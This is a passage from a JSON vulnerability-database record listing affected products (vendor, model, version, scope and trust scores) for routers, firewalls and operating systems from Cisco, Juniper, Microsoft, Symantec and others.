            "trust": 2.1,
            "vendor": "netbsd",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "unixware",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "xinuos",
            "version": "7.1.1"
          },
          {
            "_id": null,
            "model": "unixware",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "xinuos",
            "version": "7.1.3"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 1.5,
            "vendor": "cisco",
            "version": "30002.5.2"
          },
          {
            "_id": null,
            "model": "nexland isb soho firewall appliance",
            "scope": null,
            "trust": 1.1,
            "vendor": "symantec",
            "version": null
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "ibm",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "ibm",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "ibm",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "wan manager",
            "scope": null,
            "trust": 1.1,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vg248 analog phone gateway",
            "scope": null,
            "trust": 1.1,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "traffic director",
            "scope": null,
            "trust": 1.1,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rtm",
            "scope": null,
            "trust": 1.1,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "lightstream",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "1010"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "element management framework",
            "scope": null,
            "trust": 1.1,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "content router",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "4450"
          },
          {
            "_id": null,
            "model": "content router",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "4430"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "560"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "507"
          },
          {
            "_id": null,
            "model": "channel port adapter",
            "scope": null,
            "trust": 1.1,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "channel interface processor",
            "scope": null,
            "trust": 1.1,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": null,
            "trust": 1.1,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "access registrar",
            "scope": null,
            "trust": 1.1,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "12.1x46"
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "windows xp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "openserver",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "xinuos",
            "version": "5.0.6"
          },
          {
            "_id": null,
            "model": "openpgp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openpgp",
            "version": "2.6.2"
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "12.1x45"
          },
          {
            "_id": null,
            "model": "network data loss prevention",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "mcafee",
            "version": "9.2.0"
          },
          {
            "_id": null,
            "model": "windows 98se",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows 98",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "11.4r13"
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "12.1r"
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "11.4x27"
          },
          {
            "_id": null,
            "model": "network data loss prevention",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "mcafee",
            "version": "8.6"
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "12.1x47"
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "11.4"
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "12.1x44"
          },
          {
            "_id": null,
            "model": "network data loss prevention",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "mcafee",
            "version": "9.2.1"
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "11.4"
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "network data loss prevention",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "mcafee",
            "version": "9.2.2"
          },
          {
            "_id": null,
            "model": "windows 2000",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server 2003",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "openserver",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "xinuos",
            "version": "5.0.7"
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "13.3"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "cisco",
            "version": "60006.1"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "cisco",
            "version": "60005.5"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "cisco",
            "version": "50006.1"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "cisco",
            "version": "40006.1"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "cisco",
            "version": "40005.1"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "redback",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "_id": null,
            "model": "ciscoworks voice manager",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "seil/turbo",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "internet initiative",
            "version": "ver.1.19 earlier firmware"
          },
          {
            "_id": null,
            "model": "firewall services module",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "cisco 7600 for series )"
          },
          {
            "_id": null,
            "model": "systems parallel channel port adapter",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "seil/neu",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "internet initiative",
            "version": "t1  ver.1.90 earlier  ver.1.x firmware"
          },
          {
            "_id": null,
            "model": "sanrise",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hitachi",
            "version": "9500v series"
          },
          {
            "_id": null,
            "model": "catalyst 2900 series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "2948g-ge-tx"
          },
          {
            "_id": null,
            "model": "gateway security 300 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "symantec",
            "version": null
          },
          {
            "_id": null,
            "model": "ws-x6624-fxs",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "mgx 8230 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ons 15500 series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "ons 15531/15532 t31"
          },
          {
            "_id": null,
            "model": "enterprise firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "symantec",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "interstage application server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "5.0/5.1/6.0"
          },
          {
            "_id": null,
            "model": "gateway security 400 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "symantec",
            "version": null
          },
          {
            "_id": null,
            "model": "content router",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "cr-4430-b"
          },
          {
            "_id": null,
            "model": "mgx 8250 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "gateway security 5300 series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "symantec",
            "version": "v1.0"
          },
          {
            "_id": null,
            "model": "fasthub 400 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ons 15800 series dwdm platforms",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "ons 15800/15801/15808"
          },
          {
            "_id": null,
            "model": "provider-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng with application intelligence (r55)"
          },
          {
            "_id": null,
            "model": "hp ethertwist switch",
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "_id": null,
            "model": "8110 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ciscoworks for windows",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "microswitch",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "1538/1548"
          },
          {
            "_id": null,
            "model": "ws-x6608-e1",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ons 15830",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "t30 optical amplification system"
          },
          {
            "_id": null,
            "model": "windows xp",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "sp3"
          },
          {
            "_id": null,
            "model": "windows server 2003",
            "scope": null,
            "trust": 0.8,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "provider-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng fp3"
          },
          {
            "_id": null,
            "model": "switchprobe",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ix3000 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": "gateway security 5400 series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "symantec",
            "version": "v2.x"
          },
          {
            "_id": null,
            "model": "catalyst 2800 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "interstage security director",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "v5.0l10/v5.0l20/v6.0l10"
          },
          {
            "_id": null,
            "model": "bpx 8600 series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "broadb  network termination unit"
          },
          {
            "_id": null,
            "model": "vpn-1/firewall-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng with application intelligence (r55)"
          },
          {
            "_id": null,
            "model": "rt series",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "hp procurve routing switch",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "9300m series"
          },
          {
            "_id": null,
            "model": "ip/tv",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "safegate",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "2.2.1"
          },
          {
            "_id": null,
            "model": "me1100 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ix5000 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": "gs4000",
            "scope": null,
            "trust": 0.8,
            "vendor": "hitachi",
            "version": null
          },
          {
            "_id": null,
            "model": "ciscoworks host solution engine",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catalyst 3000 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn-1/firewall-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng fp3"
          },
          {
            "_id": null,
            "model": "catalyst 3900 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ws-x6608-t1",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "gr4000",
            "scope": null,
            "trust": 0.8,
            "vendor": "hitachi",
            "version": null
          },
          {
            "_id": null,
            "model": "provider-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng with application intelligence (r54)"
          },
          {
            "_id": null,
            "model": "ata 180 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "cx3200",
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": "mgx 8950 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "secure ids",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "(netranger)    ids module"
          },
          {
            "_id": null,
            "model": "ons 15400 series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "ons 15454"
          },
          {
            "_id": null,
            "model": "ons 15300 series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "ons 15327"
          },
          {
            "_id": null,
            "model": "ciscoworks wireless lan solution engine",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "fasthub 300 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "secure user registration tool",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "seil/neu",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "internet initiative",
            "version": "2fe"
          },
          {
            "_id": null,
            "model": "content switching module",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "gr2000",
            "scope": null,
            "trust": 0.8,
            "vendor": "hitachi",
            "version": null
          },
          {
            "_id": null,
            "model": "qx series",
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": "seil/neu",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "internet initiative",
            "version": "2fe plus  ver.1.10 earlier firmware"
          },
          {
            "_id": null,
            "model": "localdirector",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn-1/firewall-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng with application intelligence (r54)"
          },
          {
            "_id": null,
            "model": "windows 9x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "98"
          },
          {
            "_id": null,
            "model": "ons 15831",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "t31 dwdm system"
          },
          {
            "_id": null,
            "model": "microhub",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows 9x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "me"
          },
          {
            "_id": null,
            "model": "sn 5400 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "router",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "allied telesis",
            "version": "( includes products other than routers tcp all products that implement )"
          },
          {
            "_id": null,
            "model": "seil/neu",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "internet initiative",
            "version": "128"
          },
          {
            "_id": null,
            "model": "windows 2000",
            "scope": null,
            "trust": 0.8,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "safegate",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "v2.0l20a"
          },
          {
            "_id": null,
            "model": "interstage security director",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "v3.0l20/v4.0l10/v4.0l20"
          },
          {
            "_id": null,
            "model": "catalyst 1900 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ciscoworks device fault manager",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "mgx 8220 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "igx 8400 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "590    7320"
          },
          {
            "_id": null,
            "model": "aironet 350 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "seil/neu",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "internet initiative",
            "version": "t1  ver.2.22 earlier  ver.2.x firmware"
          },
          {
            "_id": null,
            "model": "ons 15100 series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "ons 15190/15194"
          },
          {
            "_id": null,
            "model": "internet cdn solution",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "univerge ip8800/s,/r series",
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": "systems escon channel port adapter",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "firewall/vpn appliance",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "symantec",
            "version": "100/200/200r"
          },
          {
            "_id": null,
            "model": "hp advancestack switch",
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "_id": null,
            "model": "catalyst 4000 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catalyst 2820 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "firewall services module",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "(catalyst 6500"
          },
          {
            "_id": null,
            "model": "aironet ap340 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "css 11000 series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "css 11150"
          },
          {
            "_id": null,
            "model": "ix5500 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": "gs3000",
            "scope": null,
            "trust": 0.8,
            "vendor": "hitachi",
            "version": null
          },
          {
            "_id": null,
            "model": "nexland pro series firewall appliance",
            "scope": null,
            "trust": 0.8,
            "vendor": "symantec",
            "version": null
          },
          {
            "_id": null,
            "model": "velociraptor",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "symantec",
            "version": "1.5 model 1100/1200/1300"
          },
          {
            "_id": null,
            "model": "interstage security director",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "4.0/4.1"
          },
          {
            "_id": null,
            "model": "application and content networking system",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "secure access control server software",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "for windows   unix"
          },
          {
            "_id": null,
            "model": "vg248",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "symantec",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "catalyst 1200 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "global site selector",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "mds 9000 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ix2000 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": "catalyst 5000 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "info center",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "css 11000 series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "(arrowpoint)"
          },
          {
            "_id": null,
            "model": "enterprise firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "symantec",
            "version": "7.0.4"
          },
          {
            "_id": null,
            "model": "content distribution manager",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catalyst 6000 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "content delivery manager",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "4630    4650"
          },
          {
            "_id": null,
            "model": "css 11500 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "seil/neu",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "internet initiative",
            "version": "atm  ver.1.36 earlier firmware"
          },
          {
            "_id": null,
            "model": "css 11000 series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "css 11050"
          },
          {
            "_id": null,
            "model": "ix1000 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": "cache engine",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "505    570"
          },
          {
            "_id": null,
            "model": "ons 15832",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "t31 dwdm system"
          },
          {
            "_id": null,
            "model": "windows 9x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "98 scd"
          },
          {
            "_id": null,
            "model": "intelligent contact management",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "unity",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "server"
          },
          {
            "_id": null,
            "model": "vpn 3000 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "css 11000 series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "css 11800"
          },
          {
            "_id": null,
            "model": "mgx 8850 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "hp procurve switch",
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "_id": null,
            "model": "interstage security director",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "v6.0l10"
          },
          {
            "_id": null,
            "model": "tru64 f pk8",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hp",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "50005.1"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "50004.5"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "40005.5"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "40005.2"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "30003.1"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "30003.0.3"
          },
          {
            "_id": null,
            "model": "css11500 content services switch s",
            "scope": "ne",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.30"
          },
          {
            "_id": null,
            "model": "css11500 content services switch s",
            "scope": "ne",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.20"
          },
          {
            "_id": null,
            "model": "velociraptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "13001.5"
          },
          {
            "_id": null,
            "model": "velociraptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "12001.5"
          },
          {
            "_id": null,
            "model": "velociraptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "11001.5"
          },
          {
            "_id": null,
            "model": "nexland pro800turbo firewall appliance",
            "scope": null,
            "trust": 0.3,
            "vendor": "symantec",
            "version": null
          },
          {
            "_id": null,
            "model": "nexland pro800 firewall appliance",
            "scope": null,
            "trust": 0.3,
            "vendor": "symantec",
            "version": null
          },
          {
            "_id": null,
            "model": "nexland pro400 firewall appliance",
            "scope": null,
            "trust": 0.3,
            "vendor": "symantec",
            "version": null
          },
          {
            "_id": null,
            "model": "nexland pro100 firewall appliance",
            "scope": null,
            "trust": 0.3,
            "vendor": "symantec",
            "version": null
          },
          {
            "_id": null,
            "model": "gateway security",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "54002.0.1"
          },
          {
            "_id": null,
            "model": "gateway security",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "54002.0"
          },
          {
            "_id": null,
            "model": "gateway security",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "53101.0"
          },
          {
            "_id": null,
